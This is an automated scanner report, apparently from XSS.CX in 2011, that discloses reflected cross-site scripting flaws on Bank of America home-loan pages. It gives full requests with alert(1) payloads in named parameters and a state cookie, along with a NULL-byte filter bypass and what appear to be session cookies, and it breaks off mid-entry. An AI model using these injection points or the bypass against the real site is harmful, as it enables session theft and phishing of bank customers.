XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, www9.bankofamerica.com

Report generated by XSS.CX at Fri Sep 30 14:42:16 CDT 2011.

Loading

1. Cross-site scripting (reflected)

1.1. https://www9.bankofamerica.com/home-loans/surveyInitPopupAction.go [SurveyDimensions parameter]

1.2. https://www9.bankofamerica.com/home-loans/surveyInitPopupAction.go [SurveyName parameter]

1.3. https://www9.bankofamerica.com/home-loans/surveyInitPopupAction.go [SurveyUrl parameter]

1.4. https://www9.bankofamerica.com/home-loans/home-equity.go [state cookie]

1.5. https://www9.bankofamerica.com/home-loans/home-equity.go [state cookie]

1.6. https://www9.bankofamerica.com/home-loans/mortgage-purchase.go [state cookie]

1.7. https://www9.bankofamerica.com/home-loans/refinance.go [state cookie]

2. Cacheable HTTPS response

3. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 7 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://www9.bankofamerica.com/home-loans/surveyInitPopupAction.go [SurveyDimensions parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www9.bankofamerica.com
Path:   /home-loans/surveyInitPopupAction.go

Issue detail

The value of the SurveyDimensions request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 564fa"-alert(1)-"828b6ff3597 was submitted in the SurveyDimensions parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home-loans/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yes564fa"-alert(1)-"828b6ff3597&SurveyName=Survey&SurveyUrl=http://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@helc@amp@custid@eq@& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/home-loans/home-equity.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_SHOWN_IN_LAST_6_MONTHS=N; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; session_start_time=1317409910581; WAOR=1721016747.281.0000; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=0CF12E0EEB9810EB411A830E743AE387; TLTUID=0CF12E0EEB9810EB411A830E743AE387; state=CT; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=0000vQtdPu5_bXsoGOtZH_YsQ9d:14b1t9a7b; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 19:21:27 GMT
Server: IBM_HTTP_Server
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 559


                       function show_survey_popup()
       {
           var popup_url = "/home-loans/home-loans/surveyPopupAction.go?SurveyName=Survey&SurveyUrl=http://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@helc@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yes564fa"-alert(1)-"828b6ff3597";
           var new_window;
           window.name = "SurveyParentApplicationAbandon";
           //alert("window.name=" + window.name);
           new_window = window.open( popup_url, "AppAbandonPopupWindow", "width=1,height=1,top
...[SNIP]...

1.2. https://www9.bankofamerica.com/home-loans/surveyInitPopupAction.go [SurveyName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www9.bankofamerica.com
Path:   /home-loans/surveyInitPopupAction.go

Issue detail

The value of the SurveyName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b904a"-alert(1)-"50f07d23088 was submitted in the SurveyName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home-loans/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yes&SurveyName=Surveyb904a"-alert(1)-"50f07d23088&SurveyUrl=http://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@helc@amp@custid@eq@& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/home-loans/home-equity.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_SHOWN_IN_LAST_6_MONTHS=N; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; session_start_time=1317409910581; WAOR=1721016747.281.0000; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=0CF12E0EEB9810EB411A830E743AE387; TLTUID=0CF12E0EEB9810EB411A830E743AE387; state=CT; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=0000vQtdPu5_bXsoGOtZH_YsQ9d:14b1t9a7b; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 19:21:20 GMT
Server: IBM_HTTP_Server
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 559


                       function show_survey_popup()
       {
           var popup_url = "/home-loans/home-loans/surveyPopupAction.go?SurveyName=Surveyb904a"-alert(1)-"50f07d23088&SurveyUrl=http://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@helc@amp@custid@eq@&SurveyDimensions=scrollbars@eq@yes";
           var new_window;
           window.name = "SurveyParentApplicationAband
...[SNIP]...

1.3. https://www9.bankofamerica.com/home-loans/surveyInitPopupAction.go [SurveyUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www9.bankofamerica.com
Path:   /home-loans/surveyInitPopupAction.go

Issue detail

The value of the SurveyUrl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92163"-alert(1)-"cb0e3411e4 was submitted in the SurveyUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home-loans/surveyInitPopupAction.go?SurveyPositionX=2&SurveyPositionY=2&SurveyHeight=345&SurveyWidth=625&SurveyDimensions=scrollbars@eq@yes&SurveyName=Survey&SurveyUrl=http://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@helc@amp@custid@eq@92163"-alert(1)-"cb0e3411e4& HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www9.bankofamerica.com/home-loans/home-equity.go
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_SHOWN_IN_LAST_6_MONTHS=N; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; session_start_time=1317409910581; WAOR=1721016747.281.0000; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=0CF12E0EEB9810EB411A830E743AE387; TLTUID=0CF12E0EEB9810EB411A830E743AE387; state=CT; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=0000vQtdPu5_bXsoGOtZH_YsQ9d:14b1t9a7b; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 19:06:14 GMT
Server: IBM_HTTP_Server
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 558


                       function show_survey_popup()
       {
           var popup_url = "/home-loans/home-loans/surveyPopupAction.go?SurveyName=Survey&SurveyUrl=http://bankofamerica.researchhq.com/onlinebanking/index.php?cust@eq@helc@amp@custid@eq@92163"-alert(1)-"cb0e3411e4&SurveyDimensions=scrollbars@eq@yes";
           var new_window;
           window.name = "SurveyParentApplicationAbandon";
           //alert("window.name=" + window.name);
           new_window = window.open( popup_url, "AppAbandon
...[SNIP]...

1.4. https://www9.bankofamerica.com/home-loans/home-equity.go [state cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www9.bankofamerica.com
Path:   /home-loans/home-equity.go

Issue detail

The value of the state cookie is copied into the HTML document as plain text between tags. The payload 82ef4<script>alert(1)</script>855f33ba0b0 was submitted in the state cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home-loans/home-equity.go HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bankofamerica.com/help/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_SHOWN_IN_LAST_6_MONTHS=N; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; session_start_time=1317409910581; WAOR=1721016747.281.0000; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=0CF12E0EEB9810EB411A830E743AE387; TLTUID=0CF12E0EEB9810EB411A830E743AE387; state=CT82ef4<script>alert(1)</script>855f33ba0b0; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 19:22:22 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 33118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

   
...[SNIP]...
<p>
               Information for
CT82ef4<script>alert(1)</script>855f33ba0b0                <br />
...[SNIP]...

1.5. https://www9.bankofamerica.com/home-loans/home-equity.go [state cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www9.bankofamerica.com
Path:   /home-loans/home-equity.go

Issue detail

The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4f63'-alert(1)-'fdf64ded187 was submitted in the state cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home-loans/home-equity.go HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bankofamerica.com/help/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_SHOWN_IN_LAST_6_MONTHS=N; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; session_start_time=1317409910581; WAOR=1721016747.281.0000; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=0CF12E0EEB9810EB411A830E743AE387; TLTUID=0CF12E0EEB9810EB411A830E743AE387; state=CTc4f63'-alert(1)-'fdf64ded187; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 19:22:16 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 33062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

   
...[SNIP]...
") lpAddVars('page','Product','HE');
                           if(typeof(lpAddVars)!="undefined") lpAddVars('page','Section','Product');
                           if(typeof(lpAddVars)!="undefined") lpAddVars('session','State-Cookie','CTc4f63'-alert(1)-'fdf64ded187');
               lpMTagConfig.defaultInvite = "chat-" + lpUnit + '-' + lpLanguage;
           }catch(e){}    
       </SCRIPT>
...[SNIP]...

1.6. https://www9.bankofamerica.com/home-loans/mortgage-purchase.go [state cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www9.bankofamerica.com
Path:   /home-loans/mortgage-purchase.go

Issue detail

The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 262c7'-alert(1)-'70ae1e3bcd4 was submitted in the state cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /home-loans/mortgage-purchase.go HTTP/1.1
Host: www9.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bankofamerica.com/help/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_SHOWN_IN_LAST_6_MONTHS=N; cmTPSet=Y; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; session_start_time=1317409910581; WAOR=1721016747.281.0000; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=0CF12E0EEB9810EB411A830E743AE387; TLTUID=0CF12E0EEB9810EB411A830E743AE387; state=CT262c7'-alert(1)-'70ae1e3bcd4; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; JSESSIONID=0000vQtdPu5_bXsoGOtZH_YsQ9d:14b1t9a7b; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 19:20:49 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 35332


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>

   
...[SNIP]...
AddVars('page','Product','mortgage');
                           if(typeof(lpAddVars)!="undefined") lpAddVars('page','Section','Product');
                           if(typeof(lpAddVars)!="undefined") lpAddVars('session','State-Cookie','CT262c7'-alert(1)-'70ae1e3bcd4');
               lpMTagConfig.defaultInvite = "chat-" + lpUnit + '-' + lpLanguage;
           }catch(e){}    
       </SCRIPT>
...[SNIP]...

1.7. https://www9.bankofamerica.com/home-loans/refinance.go [state cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www9.bankofamerica.com
Path:   /home-loans/refinance.go

Issue detail

